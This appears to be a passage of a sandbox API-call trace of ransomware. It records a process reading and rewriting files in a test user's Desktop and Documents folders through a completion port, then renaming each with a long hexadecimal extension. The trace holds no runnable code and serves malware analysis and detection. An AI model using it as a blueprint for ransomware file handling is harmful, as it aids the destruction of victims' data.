[0166.198] RtlInterlockedCompareExchange64 () returned 0x0 [0166.198] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.210] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.211] RtlInterlockedCompareExchange64 () returned 0x0 [0166.211] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.220] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x1800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.221] RtlInterlockedCompareExchange64 () returned 0x0 [0166.221] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.229] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.230] RtlInterlockedCompareExchange64 () returned 0x0 [0166.230] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.241] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.242] RtlInterlockedCompareExchange64 () returned 0x0 [0166.242] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.255] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x3a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.256] RtlInterlockedCompareExchange64 () returned 0x0 [0166.256] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.267] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x6600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.268] RtlInterlockedCompareExchange64 () returned 0x0 [0166.268] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.283] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.285] RtlInterlockedCompareExchange64 () returned 0x0 [0166.285] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.405] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.406] RtlInterlockedCompareExchange64 () returned 0x0 [0166.406] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.417] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74c20b8, ReturnLength=0x73dfc54) returned 0x0 [0166.419] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\UFJ2mOfKA7l3w86naRrT.doc", lpString2=".3823B3E57BCF47FA408BC5AEF26F1455D63526497AFFBBEF6D9404FA29DD5111" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\UFJ2mOfKA7l3w86naRrT.doc.3823B3E57BCF47FA408BC5AEF26F1455D63526497AFFBBEF6D9404FA29DD5111") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\UFJ2mOfKA7l3w86naRrT.doc.3823B3E57BCF47FA408BC5AEF26F1455D63526497AFFBBEF6D9404FA29DD5111" [0166.419] GetProcessHeap () returned 0x270000 [0166.419] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x126) returned 0x741ccc8 [0166.419] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x73dfc44, FileInformation=0x741ccc8, Length=0x126, FileInformationClass=0xa) returned 0x0 [0166.420] CloseHandle (hObject=0x5ac) returned 1 [0166.425] GetProcessHeap () returned 0x270000 [0166.426] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.426] RtlInterlockedCompareExchange64 () returned 0x1 [0166.426] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.429] ReadFile (in: hFile=0x5ac, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.429] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.431] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x76900b8, ReturnLength=0x73dfc54) returned 0x0 [0166.432] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\wrMNMVP8WtPmed_v jD.odp", lpString2=".8F0C262A9912EECB9B0C1093B5A604ED916072BFD4CA77C90D88531CBF807164" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\wrMNMVP8WtPmed_v jD.odp.8F0C262A9912EECB9B0C1093B5A604ED916072BFD4CA77C90D88531CBF807164") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\wrMNMVP8WtPmed_v jD.odp.8F0C262A9912EECB9B0C1093B5A604ED916072BFD4CA77C90D88531CBF807164" [0166.432] GetProcessHeap () returned 0x270000 [0166.432] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x124) returned 0x741ce00 [0166.432] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x73dfc44, FileInformation=0x741ce00, Length=0x124, FileInformationClass=0xa) returned 0x0 [0166.434] CloseHandle (hObject=0x5ac) returned 1 [0166.435] GetProcessHeap () returned 0x270000 [0166.436] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.440] RtlInterlockedCompareExchange64 () returned 0x1 [0166.440] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.457] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x3800, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.458] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.459] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74c20b8, ReturnLength=0x73dfc54) returned 0x0 [0166.461] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\WWKJRamk_dmY6.flv", lpString2=".081941A845B3D5A44227168477266FDBD0486E276A1A3C846F78F2608F6E951C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\WWKJRamk_dmY6.flv.081941A845B3D5A44227168477266FDBD0486E276A1A3C846F78F2608F6E951C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\WWKJRamk_dmY6.flv.081941A845B3D5A44227168477266FDBD0486E276A1A3C846F78F2608F6E951C" [0166.461] GetProcessHeap () returned 0x270000 [0166.461] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x118) returned 0x42f8758 [0166.461] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x73dfc44, FileInformation=0x42f8758, Length=0x118, FileInformationClass=0xa) returned 0x0 [0166.462] CloseHandle (hObject=0x5ac) returned 1 [0166.464] GetProcessHeap () returned 0x270000 [0166.465] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.465] RtlInterlockedCompareExchange64 () returned 0x1 [0166.465] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.469] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.470] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.472] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74c20b8, ReturnLength=0x73dfc54) returned 0x0 [0166.473] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ynEfaXS3MQ9Ek4.wav", lpString2=".20030B56687E20F17E2B73BD7D6B08036161DD1D072142CB1AAFB9309BE5E15A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ynEfaXS3MQ9Ek4.wav.20030B56687E20F17E2B73BD7D6B08036161DD1D072142CB1AAFB9309BE5E15A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ynEfaXS3MQ9Ek4.wav.20030B56687E20F17E2B73BD7D6B08036161DD1D072142CB1AAFB9309BE5E15A" [0166.473] GetProcessHeap () returned 0x270000 [0166.473] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11a) returned 0x42f8880 [0166.474] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x73dfc44, FileInformation=0x42f8880, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0166.476] CloseHandle (hObject=0x5ac) returned 1 [0166.477] GetProcessHeap () returned 0x270000 [0166.479] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.479] RtlInterlockedCompareExchange64 () returned 0x1 [0166.479] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.483] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.483] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.485] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74c20b8, ReturnLength=0x73dfc54) returned 0x0 [0166.487] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\YpHrE3CL0ZTRQROVql.ppt", lpString2=".F0D6DF2FCEA3233E00719DC8472667C4B719AB1658C496EEC0419148103EFF19" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\YpHrE3CL0ZTRQROVql.ppt.F0D6DF2FCEA3233E00719DC8472667C4B719AB1658C496EEC0419148103EFF19") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\YpHrE3CL0ZTRQROVql.ppt.F0D6DF2FCEA3233E00719DC8472667C4B719AB1658C496EEC0419148103EFF19" [0166.487] GetProcessHeap () returned 0x270000 [0166.487] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x122) returned 0x741cf38 [0166.487] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x73dfc44, FileInformation=0x741cf38, Length=0x122, FileInformationClass=0xa) returned 0x0 [0166.489] CloseHandle (hObject=0x5ac) returned 1 [0166.490] GetProcessHeap () returned 0x270000 [0166.492] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.493] RtlInterlockedCompareExchange64 () returned 0x1 [0166.493] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.499] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.500] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.502] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74c20b8, ReturnLength=0x73dfc54) returned 0x0 [0166.503] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\yTVqJ0atNbrX.jpg", lpString2=".2E6F0E476F20C1FEBD0F5A1E18589A384011D79847921AC86C063C7C1E16BF09" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\yTVqJ0atNbrX.jpg.2E6F0E476F20C1FEBD0F5A1E18589A384011D79847921AC86C063C7C1E16BF09") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\yTVqJ0atNbrX.jpg.2E6F0E476F20C1FEBD0F5A1E18589A384011D79847921AC86C063C7C1E16BF09" [0166.503] GetProcessHeap () returned 0x270000 [0166.503] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x116) returned 0x42f89a8 [0166.504] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x73dfc44, FileInformation=0x42f89a8, Length=0x116, FileInformationClass=0xa) returned 0x0 [0166.505] CloseHandle (hObject=0x5ac) returned 1 [0166.507] GetProcessHeap () returned 0x270000 [0166.510] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.510] RtlInterlockedCompareExchange64 () returned 0x1 [0166.510] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.515] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x3600, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.515] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.517] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74c20b8, ReturnLength=0x73dfc54) returned 0x0 [0166.518] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\Zzdaqes0LOc.xls", lpString2=".128535490CA19BD8D6EF7393AC322A47535172947026BF2E64660F7AFEBED62F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\Zzdaqes0LOc.xls.128535490CA19BD8D6EF7393AC322A47535172947026BF2E64660F7AFEBED62F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\Zzdaqes0LOc.xls.128535490CA19BD8D6EF7393AC322A47535172947026BF2E64660F7AFEBED62F" [0166.519] GetProcessHeap () returned 0x270000 [0166.519] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x114) returned 0x42f8ad0 [0166.519] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x73dfc44, FileInformation=0x42f8ad0, Length=0x114, FileInformationClass=0xa) returned 0x0 [0166.521] CloseHandle (hObject=0x5ac) returned 1 [0166.522] GetProcessHeap () returned 0x270000 [0166.524] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.524] RtlInterlockedCompareExchange64 () returned 0x1 [0166.524] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.536] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.537] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.540] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74c20b8, ReturnLength=0x73dfc54) returned 0x0 [0166.541] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\0UM7 Sy2QP8qJXxkoN.pptx", lpString2=".1452281CB74E56FB5D9C0D928C10603F75194522CE72EA094B839B338307FB33" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\0UM7 Sy2QP8qJXxkoN.pptx.1452281CB74E56FB5D9C0D928C10603F75194522CE72EA094B839B338307FB33") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\0UM7 Sy2QP8qJXxkoN.pptx.1452281CB74E56FB5D9C0D928C10603F75194522CE72EA094B839B338307FB33" [0166.541] GetProcessHeap () returned 0x270000 [0166.541] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x128) returned 0x741d070 [0166.541] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x73dfc44, FileInformation=0x741d070, Length=0x128, FileInformationClass=0xa) returned 0x0 [0166.544] CloseHandle (hObject=0x5ac) returned 1 [0166.545] GetProcessHeap () returned 0x270000 [0166.546] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.546] RtlInterlockedCompareExchange64 () returned 0x1 [0166.546] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.551] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x7400, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.551] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.553] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74c20b8, ReturnLength=0x73dfc54) returned 0x0 [0166.554] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\5f727GEb1uMbxaoBoD.docx", lpString2=".FD5E92539DED149341A01BD0BC1BBE6BC306172640CCF6C18BD2024D39CC4E62" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\5f727GEb1uMbxaoBoD.docx.FD5E92539DED149341A01BD0BC1BBE6BC306172640CCF6C18BD2024D39CC4E62") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\5f727GEb1uMbxaoBoD.docx.FD5E92539DED149341A01BD0BC1BBE6BC306172640CCF6C18BD2024D39CC4E62" [0166.554] GetProcessHeap () returned 0x270000 [0166.554] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x128) returned 0x741d1a8 [0166.555] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x73dfc44, FileInformation=0x741d1a8, Length=0x128, FileInformationClass=0xa) returned 0x0 [0166.557] CloseHandle (hObject=0x5ac) returned 1 [0166.557] GetProcessHeap () returned 0x270000 [0166.559] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.559] RtlInterlockedCompareExchange64 () returned 0x1 [0166.559] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.563] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x2a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.564] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.566] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74c20b8, ReturnLength=0x73dfc54) returned 0x0 [0166.567] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\6_F-VHS8UQkYkU.pptx", lpString2=".F7C9DFB4C0F2B79134F257A645B8A1E3A6BE47C470043AC26E8DBC6812F9AA09" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\6_F-VHS8UQkYkU.pptx.F7C9DFB4C0F2B79134F257A645B8A1E3A6BE47C470043AC26E8DBC6812F9AA09") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\6_F-VHS8UQkYkU.pptx.F7C9DFB4C0F2B79134F257A645B8A1E3A6BE47C470043AC26E8DBC6812F9AA09" [0166.568] GetProcessHeap () returned 0x270000 [0166.568] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x120) returned 0x42f8bf8 [0166.568] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x73dfc44, FileInformation=0x42f8bf8, Length=0x120, FileInformationClass=0xa) returned 0x0 [0166.569] CloseHandle (hObject=0x5ac) returned 1 [0166.571] 